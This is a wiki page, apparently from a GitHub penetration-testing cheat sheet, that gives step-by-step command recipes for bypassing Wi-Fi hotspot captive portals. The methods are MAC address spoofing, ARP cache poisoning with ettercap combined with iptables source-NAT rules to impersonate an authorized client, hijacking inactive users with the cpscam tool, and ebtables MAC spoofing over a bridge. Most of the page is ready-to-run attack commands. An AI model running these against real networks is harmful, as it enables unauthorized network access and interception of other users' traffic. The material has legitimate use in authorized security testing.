Skip to content

04. Hotspot Captive Portal Bypass

Jump to bottom
Koutto edited this page Nov 1, 2020 · 1 revision

MAC based authorization

  1. Sniff network to find an authorized client identified by his MAC address
  2. Change interface MAC address:
ifconfig wlan0 hw ether <authorized_MAC_address>

IP based authorization

Method 1: MiTM

  1. Activate IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
  1. MiTM (ARP cache poisoning) between gateway & authorized client:
ettercap -T -q -i wlan0 -w dump -M ARP /<IP_authorized_client>/ /<IP_gateway>/
  1. All packets sent from the attacker will have to spoof the authorized client IP except for packets going in the LAN:
iptables -t nat -A OUTPUT -d ! <LAN> -j SNAT --to <IP_authorized_client>
  1. Increments TTL:
iptables -t mangle -A FORWARD -d <IP_authorized_client> -j TTL --ttl-inc 1

Method 2: Inactive users

Spoof IP address of authorized client who has become inactive on hotspot (tool https://github.com/codewatchorg/cpscam):

perl cpscam.pl <interface> <ListenIP> <SubnetMask> <InactivityTimeout> <CaptiveLogoffURL>

IP+MAC based authorization

  1. Turn interface into bridge mode:
modprobe bridge
brctl addbr br0
brctl addif br0 <interface>
  1. All frames sent by attacker to the gateway will have a spoofed source MAC address:
ebtables -t nat -A POSTROUTING -o <interface> -d <MAC_gateway> -j snat --to-source <MAC_authorized_client>
  1. Apply IP based authorization bypass - Method 1 (MiTM) (cf. before).

WiFi Hacking Theory

WiFi Hacking Commands

MitM Commands

References

Clone this wiki locally